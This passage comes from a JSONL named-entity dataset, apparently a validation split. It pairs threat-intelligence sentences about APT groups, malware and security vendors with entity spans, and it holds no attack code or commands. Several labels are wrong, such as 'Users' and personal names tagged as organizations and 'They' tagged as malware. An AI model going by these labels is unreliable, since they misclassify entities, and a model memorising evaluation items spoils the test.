APT campaign targeting both macOS and Windows users .", "spans": {"Organization: Kaspersky": [[28, 37]]}, "info": {"id": "dnrti_valid_000317", "source": "dnrti_valid"}} {"text": "Cylance uncovered several bespoke backdoors deployed by the OceanLotus APT Group a.k.a APT32 , Cobalt Kitty .", "spans": {"Organization: Cylance": [[0, 7]]}, "info": {"id": "dnrti_valid_000318", "source": "dnrti_valid"}} {"text": "While continuing to monitor activity of the OceanLotus APT Group , Cylance researchers uncovered a novel payload loader that utilizes steganography to read an encrypted payload concealed within a .png image file .", "spans": {"Organization: Cylance": [[67, 74]]}, "info": {"id": "dnrti_valid_000319", "source": "dnrti_valid"}} {"text": "Gobelin Panda , a.k.a Goblin Panda , is a group that has been identified by CrowdStrike as a Chinese threat actor .", "spans": {"Organization: CrowdStrike": [[76, 87]]}, "info": {"id": "dnrti_valid_000320", "source": "dnrti_valid"}} {"text": "CrowdStrike observed Goblin Panda activity spike as tensions among South China Sea nations has risen .", "spans": {"Organization: CrowdStrike": [[0, 11]]}, "info": {"id": "dnrti_valid_000321", "source": "dnrti_valid"}} {"text": "This confirms Tropic Trooper is using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": {"Organization: Trend Micro": [[113, 124]]}, "info": {"id": "dnrti_valid_000322", "source": "dnrti_valid"}} {"text": "In a 2018 blogpost , ESET researchers predicted that Turla would use more and more generic tools .", "spans": {"Organization: ESET": [[21, 25]]}, "info": {"id": "dnrti_valid_000323", "source": "dnrti_valid"}} {"text": "ESET researchers will continue monitoring new Turla activities and will publish relevant information on our blog .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000324", "source": "dnrti_valid"}} {"text": "ESET researchers analyze new TTPs 
attributed to the Turla group that leverage PowerShell to run malware in-memory only .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000325", "source": "dnrti_valid"}} {"text": "ESET have been tracking the malicious activities related to the Ke3chang group .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000326", "source": "dnrti_valid"}} {"text": "According to Kaspersky Lab’s report , NetTraveler has been active since as early as 2004; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"Organization: Kaspersky": [[13, 22]]}, "info": {"id": "dnrti_valid_000327", "source": "dnrti_valid"}} {"text": "Kaspersky Lab’s experts calculated the amount of stolen data stored on NetTraveler’s C&C servers to be more than 22 gigabytes .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000328", "source": "dnrti_valid"}} {"text": "FireEye believes the Ke3chang attackers likely began attempting to exfiltrate sensitive data shortly thereafter .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000329", "source": "dnrti_valid"}} {"text": "This report details some of the technical findings of the Lazarus Group’s malware , observed by Novetta during Operation Blockbuster .", "spans": {"Organization: Novetta": [[96, 103]], "Organization: Operation Blockbuster": [[111, 132]]}, "info": {"id": "dnrti_valid_000330", "source": "dnrti_valid"}} {"text": "The Lazarus Group was first identified in Novetta’s report Operation Blockbuster in February 2016 .", "spans": {"Organization: Novetta’s": [[42, 51]]}, "info": {"id": "dnrti_valid_000331", "source": "dnrti_valid"}} {"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT .", "spans": {"Organization: FireEye": [[0, 7], [80, 87]]}, "info": {"id": "dnrti_valid_000332", "source": "dnrti_valid"}} {"text": "In 2018 , Kaspersky Labs published a 
report that analyzed Turla threat group .", "spans": {"Organization: Kaspersky": [[10, 19]]}, "info": {"id": "dnrti_valid_000333", "source": "dnrti_valid"}} {"text": "Starting in February 2018 , Palo Alto identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {"Organization: Palo Alto": [[28, 37]], "Organization: governmental organizations": [[118, 144]]}, "info": {"id": "dnrti_valid_000334", "source": "dnrti_valid"}} {"text": "Insikt Group investigated the domain and hosting infrastructure used by the APT33 group .", "spans": {"Organization: Insikt Group": [[0, 12]]}, "info": {"id": "dnrti_valid_000336", "source": "dnrti_valid"}} {"text": "Symantec tracks the group behind this activity as Blackfly and detects the malware they use as Backdoor.Winnti .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000337", "source": "dnrti_valid"}} {"text": "Symantec discovered Suckfly , an advanced threat group , conducting targeted attacks using multiple stolen certificates , as well as hacktools and custom malware .", "spans": {"Organization: Symantec": [[0, 8]]}, "info": {"id": "dnrti_valid_000339", "source": "dnrti_valid"}} {"text": "In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": {"Organization: Novetta": [[9, 16]]}, "info": {"id": "dnrti_valid_000340", "source": "dnrti_valid"}} {"text": "A few days ago , Symantec discovered a new document that appears to be part of the ongoing BlackEnergy APT group attacks against Ukraine .", "spans": {"Organization: Symantec": [[17, 25]]}, "info": {"id": "dnrti_valid_000341", "source": "dnrti_valid"}} {"text": "While analyzing a campaign run by the Gamaredon group , FortiGuard Labs discovered the tools they used to prepare the attack and found artifacts left behind by the actors that allowed us to perform a 
large amount of forensic analysis .", "spans": {"Organization: FortiGuard Labs": [[56, 71]]}, "info": {"id": "dnrti_valid_000342", "source": "dnrti_valid"}} {"text": "In this blog , Unit 42 provides details of the tools and tactics we observed on these compromised SharePoint servers , explain how we believe these connect to the Emissary Panda threat group .", "spans": {"Organization: Unit 42": [[15, 22]]}, "info": {"id": "dnrti_valid_000343", "source": "dnrti_valid"}} {"text": "QiAnXin identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage .", "spans": {"Organization: QiAnXin": [[0, 7]]}, "info": {"id": "dnrti_valid_000344", "source": "dnrti_valid"}} {"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": {"Organization: CTU": [[0, 3]], "Organization: Russian government": [[147, 165]]}, "info": {"id": "dnrti_valid_000345", "source": "dnrti_valid"}} {"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances .", "spans": {}, "info": {"id": "dnrti_valid_000346", "source": "dnrti_valid"}} {"text": "As Unit 42 have observed throughout our tracking of the OilRig group , adopting proven tactics has been a common behavior over time .", "spans": {"Organization: Unit 42": [[3, 10]]}, "info": {"id": "dnrti_valid_000347", "source": "dnrti_valid"}} {"text": "The OceanLotus group was first revealed and named by QiAnXin in May 2015 .", "spans": {"Organization: QiAnXin": [[53, 60]]}, "info": {"id": "dnrti_valid_000348", "source": "dnrti_valid"}} {"text": "The OceanLotus , an APT group said to have a Vietnamese background , was first exposed and named by QiAnXin in May 2015 .", "spans": {"Organization: 
QiAnXin": [[100, 107]]}, "info": {"id": "dnrti_valid_000349", "source": "dnrti_valid"}} {"text": "The QiAnXin keeps a close eye on activities made by OceanLotus .", "spans": {"Organization: QiAnXin": [[4, 11]]}, "info": {"id": "dnrti_valid_000350", "source": "dnrti_valid"}} {"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia .", "spans": {"Organization: PatchSky": [[29, 37]]}, "info": {"id": "dnrti_valid_000351", "source": "dnrti_valid"}} {"text": "After investigation , QiAnXin suspect this attack is carried out by Molerats .", "spans": {"Organization: QiAnXin": [[22, 29]]}, "info": {"id": "dnrti_valid_000352", "source": "dnrti_valid"}} {"text": "In June 2017 , QiAnXin discovered new malware used by Molerats .", "spans": {"Organization: QiAnXin": [[15, 22]]}, "info": {"id": "dnrti_valid_000353", "source": "dnrti_valid"}} {"text": "Last month , QiAnXin captured multiple phishing emails sent by TA505 Group to target financial institutions .", "spans": {"Organization: QiAnXin": [[13, 20]]}, "info": {"id": "dnrti_valid_000354", "source": "dnrti_valid"}} {"text": "QiAnXin confirmed that this is a DarkHydrus Group’s new attack targeting Middle East region .", "spans": {"Organization: QiAnXin": [[0, 7]]}, "info": {"id": "dnrti_valid_000355", "source": "dnrti_valid"}} {"text": "First described by Kaspersky in 2014 and later by Cylance in 2017 , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries .", "spans": {"Organization: Kaspersky": [[19, 28]], "Organization: Cylance": [[50, 57]]}, "info": {"id": "dnrti_valid_000356", "source": "dnrti_valid"}} {"text": "It’s now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware , ” said Dennis Schwarz , research analyst on Arbor , in an interview with Threatpost .", "spans": {"Organization: Arbor": [[183, 188]]}, 
"info": {"id": "dnrti_valid_000357", "source": "dnrti_valid"}} {"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 .", "spans": {"Organization: ESET": [[26, 30]]}, "info": {"id": "dnrti_valid_000358", "source": "dnrti_valid"}} {"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 .", "spans": {"Organization: 360 Helios Team": [[0, 15]]}, "info": {"id": "dnrti_valid_000359", "source": "dnrti_valid"}} {"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies .", "spans": {"Organization: 360 Helios Team": [[19, 34]], "Organization: government": [[211, 221]], "Organization: maritime agencies": [[263, 280]]}, "info": {"id": "dnrti_valid_000360", "source": "dnrti_valid"}} {"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 .", "spans": {"Organization: Antiy Lab": [[14, 23]]}, "info": {"id": "dnrti_valid_000361", "source": "dnrti_valid"}} {"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals .", "spans": {"Organization: 360 Core Security": [[15, 32]]}, "info": {"id": "dnrti_valid_000362", "source": "dnrti_valid"}} {"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group .", "spans": {"Organization: 360 Core Security": [[67, 84]]}, "info": {"id": "dnrti_valid_000363", "source": "dnrti_valid"}} {"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group’s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild .", 
"spans": {"Organization: 360 Core Security": [[22, 39]], "Vulnerability: (CVE-2018-8174)": [[132, 147]]}, "info": {"id": "dnrti_valid_000364", "source": "dnrti_valid"}} {"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000365", "source": "dnrti_valid"}} {"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team .", "spans": {"Organization: Symantec": [[38, 46]]}, "info": {"id": "dnrti_valid_000366", "source": "dnrti_valid"}} {"text": "In addition , OceanLotus is also known to use ‘watering hole attacks’ , which involve the compromise of a website that the victim is likely to visit .", "spans": {}, "info": {"id": "dnrti_valid_000367", "source": "dnrti_valid"}} {"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000368", "source": "dnrti_valid"}} {"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000369", "source": "dnrti_valid"}} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries .", "spans": 
{"Organization: Dragos": [[0, 6]]}, "info": {"id": "dnrti_valid_000370", "source": "dnrti_valid"}} {"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000371", "source": "dnrti_valid"}} {"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan .", "spans": {"Organization: Kaspersky": [[42, 51]], "Organization: government": [[118, 128]]}, "info": {"id": "dnrti_valid_000372", "source": "dnrti_valid"}} {"text": "Kaspersky also published details on how Zebrocy has added the Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000373", "source": "dnrti_valid"}} {"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states .", "spans": {"Organization: ESET": [[0, 4]]}, "info": {"id": "dnrti_valid_000374", "source": "dnrti_valid"}} {"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories .", "spans": {"Organization: ESET": [[102, 106]]}, "info": {"id": "dnrti_valid_000375", "source": "dnrti_valid"}} {"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy” , to the LuckyMouse APT group (aka EmissaryPanda and APT27) .", "spans": {"Organization: Kaspersky": [[0, 9]]}, "info": {"id": "dnrti_valid_000376", "source": "dnrti_valid"}} {"text": "Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at 
least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers .", "spans": {"Organization: Kaspersky": [[57, 66]], "Organization: Apple customers": [[229, 244]]}, "info": {"id": "dnrti_valid_000377", "source": "dnrti_valid"}} {"text": "In this blog post , FireEye researchers are going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41 .", "spans": {"Organization: FireEye": [[20, 27], [85, 92]]}, "info": {"id": "dnrti_valid_000379", "source": "dnrti_valid"}} {"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations .", "spans": {"Vulnerability: (CVE-2018-0802)": [[62, 77]]}, "info": {"id": "dnrti_valid_000380", "source": "dnrti_valid"}} {"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor .", "spans": {}, "info": {"id": "dnrti_valid_000381", "source": "dnrti_valid"}} {"text": "There have been reports of real-time phishing in the wild as early as 2010 .", "spans": {}, "info": {"id": "dnrti_valid_000382", "source": "dnrti_valid"}} {"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool – named ReelPhish – that simplifies the real-time phishing technique .", "spans": {}, "info": {"id": "dnrti_valid_000383", "source": "dnrti_valid"}} {"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests .", "spans": {}, "info": {"id": "dnrti_valid_000384", "source": "dnrti_valid"}} {"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States .", "spans": {"Organization: private firms": [[179, 
192]]}, "info": {"id": "dnrti_valid_000385", "source": "dnrti_valid"}} {"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism .", "spans": {"Organization: Mandiant": [[31, 39]]}, "info": {"id": "dnrti_valid_000386", "source": "dnrti_valid"}} {"text": "The group has also been reported as Leviathanby other security firms .", "spans": {"Organization: Leviathanby": [[36, 47]]}, "info": {"id": "dnrti_valid_000387", "source": "dnrti_valid"}} {"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit .", "spans": {}, "info": {"id": "dnrti_valid_000388", "source": "dnrti_valid"}} {"text": "The tool then starts a new web browser instance on the attacker’s system and submits credentials on the real VPN portal .", "spans": {}, "info": {"id": "dnrti_valid_000389", "source": "dnrti_valid"}} {"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration .", "spans": {}, "info": {"id": "dnrti_valid_000390", "source": "dnrti_valid"}} {"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors .", "spans": {}, "info": {"id": "dnrti_valid_000391", "source": "dnrti_valid"}} {"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network 
environments .", "spans": {}, "info": {"id": "dnrti_valid_000392", "source": "dnrti_valid"}} {"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China .", "spans": {"Organization: FireEye": [[86, 93]]}, "info": {"id": "dnrti_valid_000393", "source": "dnrti_valid"}} {"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations .", "spans": {"Organization: North Korean government": [[156, 179]]}, "info": {"id": "dnrti_valid_000394", "source": "dnrti_valid"}} {"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign .", "spans": {}, "info": {"id": "dnrti_valid_000395", "source": "dnrti_valid"}} {"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India .", "spans": {}, "info": {"id": "dnrti_valid_000397", "source": "dnrti_valid"}} {"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 .", "spans": {"Organization: FireEye": [[0, 7]], "Vulnerability: CVE-2017-10271": [[79, 93]]}, "info": {"id": "dnrti_valid_000401", "source": "dnrti_valid"}} {"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors .", "spans": {"Organization: Users": [[0, 5]]}, "info": {"id": "dnrti_valid_000402", "source": "dnrti_valid"}} {"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh 
Londhe , Dileep .", "spans": {"Organization: Yogesh Londhe": [[67, 80]], "Organization: Dileep": [[83, 89]]}, "info": {"id": "dnrti_valid_000403", "source": "dnrti_valid"}} {"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host .", "spans": {"Vulnerability: EternalBlue": [[218, 229]]}, "info": {"id": "dnrti_valid_000404", "source": "dnrti_valid"}} {"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server .", "spans": {}, "info": {"id": "dnrti_valid_000406", "source": "dnrti_valid"}} {"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits .", "spans": {}, "info": {"id": "dnrti_valid_000407", "source": "dnrti_valid"}} {"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors .", "spans": {}, "info": {"id": "dnrti_valid_000409", "source": "dnrti_valid"}} {"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper .", "spans": {"Vulnerability: zero-day": [[54, 62]]}, "info": {"id": "dnrti_valid_000410", "source": "dnrti_valid"}} {"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base .", "spans": {"Organization: South Korean government": [[71, 94]]}, "info": {"id": "dnrti_valid_000411", "source": "dnrti_valid"}} {"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit 
employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets .", "spans": {}, "info": {"id": "dnrti_valid_000412", "source": "dnrti_valid"}} {"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY .", "spans": {"Organization: FireEye iSIGHT": [[19, 33]]}, "info": {"id": "dnrti_valid_000413", "source": "dnrti_valid"}} {"text": "FireEye products have robust detection for the malware used in this campaign .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000415", "source": "dnrti_valid"}} {"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": {"Organization: engineering firms": [[157, 174]], "Organization: government": [[233, 243]], "Organization: research universities": [[258, 279]]}, "info": {"id": "dnrti_valid_000416", "source": "dnrti_valid"}} {"text": "Infection VectorWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails .", "spans": {}, "info": {"id": "dnrti_valid_000418", "source": "dnrti_valid"}} {"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 .", "spans": {"Vulnerability: CVE-2017-8759": [[49, 62]]}, "info": {"id": "dnrti_valid_000420", "source": "dnrti_valid"}} {"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild .", "spans": {"Vulnerability: vulnerability": [[5, 18]], "Organization: FireEye": [[37, 44]]}, "info": {"id": "dnrti_valid_000421", "source": "dnrti_valid"}} {"text": "We have observed this recent wave of Zyklon malware being delivered 
primarily through spam emails .", "spans": {}, "info": {"id": "dnrti_valid_000422", "source": "dnrti_valid"}} {"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office .", "spans": {"Vulnerability: CVE-2017-11882": [[37, 51]], "Vulnerability: (CVE-2017-11882)": [[146, 162]]}, "info": {"id": "dnrti_valid_000424", "source": "dnrti_valid"}} {"text": "It follows Stuxnet which was used against Iran in 2010 and Industroyer which we believe was deployed by Sandworm Team against Ukraine in 2016 .", "spans": {}, "info": {"id": "dnrti_valid_000425", "source": "dnrti_valid"}} {"text": "Command & Control Communication The C2 communication of Zyklon is proxied through the Tor network .", "spans": {}, "info": {"id": "dnrti_valid_000426", "source": "dnrti_valid"}} {"text": "At this time of writing , FireEye Multi Vector Execution (MVX) engine is able to recognize and block this threat .", "spans": {"Organization: FireEye": [[26, 33]]}, "info": {"id": "dnrti_valid_000427", "source": "dnrti_valid"}} {"text": "The targeting of critical infrastructure to disrupt , degrade , or destroy systems is consistent with numerous attack and reconnaissance activities carried out globally by Russian , Iranian , North Korean , U.S. 
, and Israeli nation state actors .", "spans": {"Organization: critical infrastructure": [[17, 40]]}, "info": {"id": "dnrti_valid_000428", "source": "dnrti_valid"}} {"text": "Specifically , the following facts support this assessment: The attacker targeted the SIS suggesting an interest in causing a high-impact attack with physical consequences .", "spans": {}, "info": {"id": "dnrti_valid_000429", "source": "dnrti_valid"}} {"text": "First , the attacker’s mission is to disrupt an operational process rather than steal data .", "spans": {}, "info": {"id": "dnrti_valid_000430", "source": "dnrti_valid"}} {"text": "The TRITON malware contained the capability to communicate with Triconex SIS controllers .", "spans": {}, "info": {"id": "dnrti_valid_000431", "source": "dnrti_valid"}} {"text": "the attacker did not leverage all of TRITON’s extensive reconnaissance capabilities .", "spans": {}, "info": {"id": "dnrti_valid_000432", "source": "dnrti_valid"}} {"text": "For instance , Russian operators , such as Sandworm Team , have compromised Western ICS over a multi-year period without causing a disruption .", "spans": {}, "info": {"id": "dnrti_valid_000434", "source": "dnrti_valid"}} {"text": "The TRITON sample Mandiant analyzed added an attacker-provided program to the execution table of the Triconex controller .", "spans": {"Organization: Mandiant": [[18, 26]]}, "info": {"id": "dnrti_valid_000435", "source": "dnrti_valid"}} {"text": "We assess that this was an anti-forensics technique to hide the presence of the attacker code on the Triconex controller .", "spans": {}, "info": {"id": "dnrti_valid_000437", "source": "dnrti_valid"}} {"text": "This entry was posted on Thu Dec 14 10:00 EST 2017 and filed under Malware , Nathan Brubaker , Christopher Glyer , Blake Johnson , Dan Caban , Marina Krotofil , ICS Security , and Dan Scali .", "spans": {"Organization: ICS Security": [[161, 173]]}, "info": {"id": "dnrti_valid_000438", "source": "dnrti_valid"}} {"text": "Keeping in mind 
the sensitivity of passwords , GoCrack includes an entitlement-based system that prevents users from accessing task data unless they are the original creator or they grant additional users to the task .", "spans": {"Organization: additional users": [[188, 204]]}, "info": {"id": "dnrti_valid_000440", "source": "dnrti_valid"}} {"text": "Throughout 2017 , we observed two versions of BACKSWING and saw a significant increase in May with an apparent focus on compromising Ukrainian websites .", "spans": {}, "info": {"id": "dnrti_valid_000441", "source": "dnrti_valid"}} {"text": "This entry was posted on Tue Nov 28 14:00 EST 2017 and filed under Malware , Sandor Nemes , Malware Analysis , and Abhay Vaish .", "spans": {}, "info": {"id": "dnrti_valid_000443", "source": "dnrti_valid"}} {"text": "FireEye network devices blocked infection attempts at over a dozen victims primarily in Germany , Japan , and the U.S until Oct. 24 at 15:00 UTC , when the infection attempts ceased and attacker infrastructure – both 1dnscontrol.com and the legitimate websites containing the rogue code – were taken offline .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000444", "source": "dnrti_valid"}} {"text": "FireEye observed that BACKSWING , a malicious JavaScript profiling framework , was deployed to at least 54 legitimate sites starting as early as September 2016 .", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000446", "source": "dnrti_valid"}} {"text": "Beginning in May 2017 , FireEye observed a number of Ukrainian websites compromised with BACKSWING v1 , and in June 2017 , began to see content returned from BACKSWING receivers .", "spans": {"Organization: FireEye": [[24, 31]], "Organization: BACKSWING v1": [[89, 101]], "Organization: BACKSWING": [[158, 167]]}, "info": {"id": "dnrti_valid_000448", "source": "dnrti_valid"}} {"text": "FireEye observed this framework on compromised Turkish sites and Montenegrin sites over the past year 
.", "spans": {"Organization: FireEye": [[0, 7]]}, "info": {"id": "dnrti_valid_000449", "source": "dnrti_valid"}} {"text": "The developer consistently used Accept-Enconding” (note the extra ‘n’) in all DanBot samples analyzed by CTU researchers .", "spans": {"Malware: DanBot": [[78, 84]], "Organization: CTU": [[105, 108]]}, "info": {"id": "dnrti_valid_000455", "source": "dnrti_valid"}} {"text": "Previous versions were described by Kaspersky in 2014 and Cylance in 2017 .", "spans": {"Malware: Previous versions": [[0, 17]], "Organization: Kaspersky": [[36, 45]]}, "info": {"id": "dnrti_valid_000456", "source": "dnrti_valid"}} {"text": "The GoogleUpdate.exe component is responsible for communicating with the remote C&C server .", "spans": {"Malware: GoogleUpdate.exe": [[4, 20]]}, "info": {"id": "dnrti_valid_000457", "source": "dnrti_valid"}} {"text": "This way , the malware can have its configuration , malicious binaries and file listings updated , but can also download and execute other binaries .", "spans": {"Malware: malware": [[15, 22]]}, "info": {"id": "dnrti_valid_000458", "source": "dnrti_valid"}} {"text": "They also download apks secretly and record audios and videos , then upload users’ privacy information to server , causing users’ privacy leakage .", "spans": {"Malware: They": [[0, 4]]}, "info": {"id": "dnrti_valid_000459", "source": "dnrti_valid"}} {"text": "The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached , and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system .", "spans": {"Malware: document files": [[106, 120]]}, "info": {"id": "dnrti_valid_000460", "source": "dnrti_valid"}} {"text": "Backdoor installed in the infected system distributed additional botnet malware , ransomware and email stealers .", "spans": {"Malware: Backdoor": [[0, 8]]}, "info": {"id": "dnrti_valid_000461", "source": "dnrti_valid"}} 
{"text": "The email stealer collects connection protocol information and account information , such as SMTP , IMAP , and POP3 , which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format .", "spans": {"Malware: email stealer": [[4, 17]]}, "info": {"id": "dnrti_valid_000462", "source": "dnrti_valid"}} {"text": "The threat actor’s emails usually contain a picture or a link without a malicious payload and are sent out to a huge recipient database of up to 85 , 000 users .", "spans": {"Malware: malicious payload": [[72, 89]], "Organization: users": [[154, 159]]}, "info": {"id": "dnrti_valid_000463", "source": "dnrti_valid"}} {"text": "Group-IB has also detected recon emails sent out to New Zealand .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: recon emails": [[27, 39]]}, "info": {"id": "dnrti_valid_000464", "source": "dnrti_valid"}} {"text": "In 2019 , Group-IB also observed the use of a new fileless PowerShell loader called Ivoke .", "spans": {"Organization: Group-IB": [[10, 18]], "Malware: Ivoke": [[84, 89]]}, "info": {"id": "dnrti_valid_000465", "source": "dnrti_valid"}} {"text": "The Silence.Main Trojan , which is the main stage of the attack , has a full set of commands to control a compromised computer .", "spans": {"Malware: Silence.Main Trojan": [[4, 23]]}, "info": {"id": "dnrti_valid_000466", "source": "dnrti_valid"}} {"text": "Group-IB specialists tracked a massive mailout of emails containing a malicious Microsoft Word attachment titled Договор.doc” [Contract.doc] .", "spans": {"Organization: Group-IB": [[0, 8]], "Malware: malicious Microsoft Word attachment": [[70, 105]]}, "info": {"id": "dnrti_valid_000467", "source": "dnrti_valid"}} {"text": "On 24 March 2019 , Silence.ProxyBot (MD5 2fe01a04d6beef14555b2cf9a717615c) was uploaded to VirusTotal from an IP address in Sri Lanka .", "spans": {"Malware: Silence.ProxyBot": [[19, 35]]}, "info": {"id": "dnrti_valid_000468", 
